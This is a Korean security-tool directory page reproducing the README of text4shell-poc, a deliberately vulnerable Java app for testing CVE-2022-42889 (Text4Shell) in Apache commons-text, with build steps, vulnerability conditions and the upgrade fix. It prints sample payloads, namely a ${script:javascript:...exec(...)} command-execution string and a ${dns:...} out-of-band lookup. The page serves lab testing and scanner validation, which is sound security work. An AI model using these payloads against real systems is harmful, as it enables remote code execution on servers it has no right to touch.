Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
text4shell-poc — CVE-2022-42889 테스트를 위한 개념 증명 애플리케이션 | Kitploit
도구/GitHubGitHub/securekomodo/text4shell-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsecurekomodo/text4shell-poc

text4shell-poc

CVE-2022-42889 테스트를 위한 개념 증명 애플리케이션

저장소 보기
8113년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-42889 PoC 테스트 애플리케이션

이것은 취약점 CVE-2022-42889에 대한 개념 증명(Proof of Concept)으로 개발된 취약한 애플리케이션입니다.

Maven 설치

이것을 실행하려면 다음이 필요합니다:

  • JDK 17 이상
  • Maven
  1. git 저장소를 클론합니다
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Maven 설치로 JAR 생성
root@kitploit:~
mvn clean install

이렇게 하면 ./target 폴더가 생성되고, 해당 폴더 안에 JAR 파일 text4shell-poc-0.0.1-SNAPSHOT.jar이 있어야 합니다.

  1. 웹서버 시작
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

이렇게 하면 기본적으로 localhost의 8080 포트에서 수신 대기하는 웹 서버가 시작됩니다.

  1. 웹서버로 이동

http://localhost:8080/에서 웹서버에 접근하면 다음 출력이 표시되어야 합니다.

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. 수동으로 익스플로잇하거나 text4shell-scan을 사용하여 스캔을 수행합니다.

샘플 익스플로잇 페이로드

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

성공적인 익스플로잇 시연을 위한 권장 URL 인코더: https://www.urlencoder.org/.

Docker

또는 Docker를 사용하여 이 PoC를 실행할 수 있습니다:

  1. git 저장소를 클론합니다
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker 빌드
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker 실행
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. 취약한 앱 테스트
root@kitploit:~
http://localhost/
  1. 아래와 같이 “${prefix:name}” 문자열을 전달하여 공격을 수행할 수 있습니다:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

성공적인 익스플로잇 시연을 위한 권장 URL 인코더: https://www.urlencoder.org/.

또는 text4shell-scan과 같은 스캐닝 도구의 효율성을 검증할 수 있습니다.

취약하십니까?

코드가 취약하려면 다음 조건을 충족해야 합니다:

  • Apache commons-text 버전 1.5.0 이상부터 1.10.0 미만까지 실행 중이어야 함
  • StringSubstituion에 Interpolation을 사용 중이어야 함 (https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html 참조) - 참고로 이는 매우 흔하지 않습니다

수정 방법

수정 방법은 commons-text 인스턴스를 버전 1.10.0 이상으로 업데이트하는 것입니다.

작성자

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
도구 다운로드